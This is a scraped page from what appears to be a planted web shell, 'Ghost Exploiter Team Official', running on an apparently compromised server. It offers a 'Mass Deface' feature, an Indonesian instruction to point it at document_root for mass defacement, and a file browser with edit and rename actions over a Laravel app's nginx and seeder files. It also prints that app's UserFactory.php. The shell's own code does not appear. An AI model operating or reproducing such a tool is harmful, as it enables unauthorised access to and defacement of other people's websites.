Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
docker
/
nginx
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AuthService.php
0.683KB
edt
ren
RoleTableSeeder.php
1.04KB
edt
ren
UserFactory.php
1.347KB
edt
ren
accounts.php
0KB
edt
ren
api.php
0KB
edt
ren
auth.php
0KB
edt
ren
cache.php
3.395KB
edt
ren
console.php
0KB
edt
ren
default-20260128003810.
...
0.759KB
edt
ren
default.conf
0.759KB
edt
ren
index.php
0KB
edt
ren
integrations.php
0.694KB
edt
ren
<?php declare(strict_types=1); namespace Database\Factories; use App\Models\User as UserEloquent; use Illuminate\Database\Eloquent\Factories\Factory; use Illuminate\Support\Facades\Hash; use Illuminate\Support\Str; /** * @extends \Illuminate\Database\Eloquent\Factories\Factory<\App\Models\User> */ final class UserFactory extends Factory { protected $model = UserEloquent::class; /** * The current password being used by the factory. */ protected static ?string $password; /** * Define the model's default state. * * @return array<string, mixed> */ public function definition(): array { return [ 'first_name' => fake()->unique()->firstName(), 'last_name' => fake()->unique()->lastName(), 'patronymic' => fake()->firstNameMale() . 'ович', 'email' => fake()->unique()->safeEmail(), 'email_verified_at' => now(), 'password' => static::$password ??= Hash::make('password'), 'is_active' => fake()->boolean(), 'remember_token' => Str::random(10), ]; } /** * Indicate that the model's email address should be unverified. */ public function unverified(): static { return $this->state(fn (array $attributes) => [ 'email_verified_at' => null, ]); } }